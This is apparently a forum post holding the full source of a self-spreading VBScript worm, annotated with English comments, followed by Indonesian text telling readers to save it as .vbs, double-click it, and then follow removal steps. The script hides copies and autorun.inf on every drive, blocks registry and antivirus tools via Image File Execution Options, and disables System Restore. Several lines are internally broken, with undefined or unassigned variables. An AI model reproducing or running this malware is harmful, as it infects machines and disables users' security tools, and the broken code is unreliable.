------------------------script begin--------------------------
' Analysis notes (defender view): VBScript sample that copies itself to the
' system folder and to drive roots, drops an autorun.inf beside each copy,
' and rewrites security-relevant registry values. The comments describe what
' each statement does so the artefacts can be recognised and cleaned up.
' Artefacts named in this listing: hck3d.vbs (system folder), vhck3d.vbs and
' autorun.inf (drive roots), a running wscript.exe, and the registry values
' written below.
'
' Runtime errors are suppressed, so any file or registry call that fails is
' skipped silently and execution continues with the next statement.
On error resume next
Dim dik,jatiya,i,loph,you,mf,isi,tf,vhck3d,nt,check,sd
' String literal holding autorun.inf text: an [autorun] section whose
' shellexecute entry starts vhck3d.vbs through wscript.exe.
Set = "[autorun]" & vbcrlf & "shellexecute=wscript.exe vhck3d.vbs"
' you = FileSystemObject; mf = File object for the script that is running.
Set you = createobject("scripting.filesystemobject")
Set mf = you.getfile(wscript.scriptfullname)
Dim text,size
' Size of the running script file (not referenced again in this listing).
Size = mf.size
' DriveType of the drive the script was started from (1 = removable,
' 2 = fixed). It is read once here and never reassigned inside the loop.
Check = mf.drive.drivetype
' Open the running script for reading (1 = ForReading, -2 = system default
' encoding) and collect its own source, line by line, into dik.
Set text = mf.openastextstream(1,-2)
Do while not text.atendofstream
Dik = dik & text.readline
Dik = dik & vbcrlf
Loop
' Main loop. It ends only when check = 1; for any other start drive type the
' body is repeated after each sleep for as long as the process lives.
Do
' Create the "mother" (master) copy file.
' GetSpecialFolder(0) is the Windows folder, GetSpecialFolder(1) the system folder.
Set i = you.getspecialfolder(0)
Set jatiya = you.getspecialfolder(1)
' Reset an existing hck3d.vbs to attribute 32 (archive only) so that it can
' be overwritten.
Set tf = you.getfile(jatiya & "\hck3d.vbs")
Tf.attributes = 32
' CreateTextFile(name, overwrite, unicode): the second argument is the
' overwrite flag (non-zero here), the third requests a Unicode file.
Set tf = you.createtextfile(jatiya & "\hck3d.vbs",2,true)
Tf.write dini
Tf.close
' Attribute 39 = read-only (1) + hidden (2) + system (4) + archive (32): the
' file is not shown in a default Explorer view.
Set tf = you.getfile(jatiya & "\hck3d.vbs")
Tf.attributes = 39
' Spread to removable disks together with an autorun.inf (original author's
' aside: he did not know the English term for this).
' Every drive of type 1 (removable) or 2 (fixed) is processed; "a:" is skipped.
For each loph in you.drives
If (loph.drivetype = 1 or loph.drivetype = 2) and loph.path <> "a:" then
Set tf=you.getfile(loph.path &"\vhck3d.sys.vbs")
Tf.attributes =32
' Write the collected script source (dik) to <drive>\vhck3d.vbs, then mark
' the file read-only + hidden + system + archive (39).
Set tf=you.createtextfile(loph.path &"\vhck3d.vbs",2,true)
Tf.write dik
Tf.close
Set tf=you.getfile(loph.path &"\vhck3d.vbs")
Tf.attributes = 39
' Same sequence for <drive>\autorun.inf: reset attributes, recreate the
' file, write the contents of isi, then hide it again with attribute 39.
Set tf =you.getfile(loph.path &"\autorun.inf")
Tf.attributes = 32
Set tf=you.createtextfile(loph.path &"\autorun.inf",2,true)
Tf.write isi
Tf.close
Set tf = you.getfile(loph.path &"\autorun.inf")
Tf.attributes=39
End if
Next
' Registry manipulation.
Set vhck3d = createobject("wscript.shell")
' Original author's remark: it is plain to see that this virus tampers with our registry.
' Each line below writes a "debugger" value (empty string) under Image File
' Execution Options for one executable name; the names cover the system
' configuration and registry tools, a setup program and several antivirus /
' removal tools. Writes under this key by a script host are a well-known
' tampering indicator (MITRE ATT&CK T1546.012) and worth alerting on.
' NOTE(review): the effect of an empty debugger string on starting these
' tools is not established by this listing - confirm before relying on it.
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\msconfig.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedit.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedt32.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\registryeditor.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\setup.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avscan.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avcenter.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ashavast.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ansav.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremoval.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremover.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\pcmav-cln.exe.exe\debugger",""
' Writes the string "my loph dini" as a legalnoticecaption value.
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows\currentversion\winlogon\legalnoticecaption", "my loph dini"
' Sets Windows Installer and System Restore policy values to DWORD 1. These
' four values, like the debugger values above, have to be reviewed and
' reverted during clean-up; deleting the dropped files does not undo them.
Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\limitsystemrestorecheckpointing", "1", "reg_dword"
Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\disablemsi", "1", "reg_dword"
Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disablesr", "1", "reg_dword"
Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disableconfig", "1", "reg_dword"
' When the script was not started from a removable drive, wait 200000 ms
' (200 s) and run the loop body again, so deleted copies and reverted
' registry values are rewritten while wscript.exe stays alive.
If check <> 1 then
Wscript.sleep 200000
End if
Loop while check <> 1
' Reached only when check = 1 (started from a removable drive): open an
' Explorer window from the Windows folder with the script file selected.
Set sd = createobject("wscript.shell")
Sd.run i & "\explorer.exe /e,/select, " & wscript.scriptfullname
-----------------------end script-----------------------------
Sip Sekarang save dengan Format Vbs..Trus hasilnya double klick ...dan ikuti cara seterusnya dibawah ini...
SEKARANG ANDA BASMI VIRUS TERSEBUT....
Ikuti saja langkah-langkah di bawah ini untuk pembasmiannya. Kalau virusnya aktif (kalo belum, diaktifkan laaah), jangan buka My Computer seperti biasa, tapi buka melalui Explorer: bisa lewat Start -> klik kanan di My Computer, bisa juga lewat tombol jendela + E (logo Windows yang ada di keyboard). Lalu masuk ke setiap drive melalui tree; ini agar virusnya tidak jalan di banyak drive, cukup jalan di satu drive tempat kalian menyimpan dan mengaktifkan virus tersebut. Soalnya, kalau virusnya sudah aktif lalu kalian klik 2x tiap-tiap drive, virus itu aktif di banyak drive karena di setiap drive ada file autorun-nya.
Cara pembasmiannya :
1. Pake plugins ansav yang registry fx, ansav bisa kalian dapatkan disini http://ansav.com/. Setelah itu pilih check all, lalu restart explorer
2. Panggil Task Manager, bisa melalui Ctrl+Shift bersamaan lalu tekan Esc; di tab Processes, bunuh semua wscript.exe yang ada.
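3. Hapus semua file vhck3d.vbs serta autorun.inf di setiap drive. Skrip memberi file-file ini atribut 39 (read-only, hidden, system, archive), jadi tampilkan dulu file tersembunyi dan file sistem supaya file-file itu terlihat.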
4. Hapus file induknya di c:\windows\system32 yang bernama hck3d.vbs
5. Panggil Run, bisa melalui jendela + R (logo Windows di keyboard), masukkan parameternya PCMAV untuk mengembalikan settingan registry yang diubah.
TERIMA KASIH BAGI YANG SUDAH MEMBACA DAN MEMPRAKTIKKANNYA...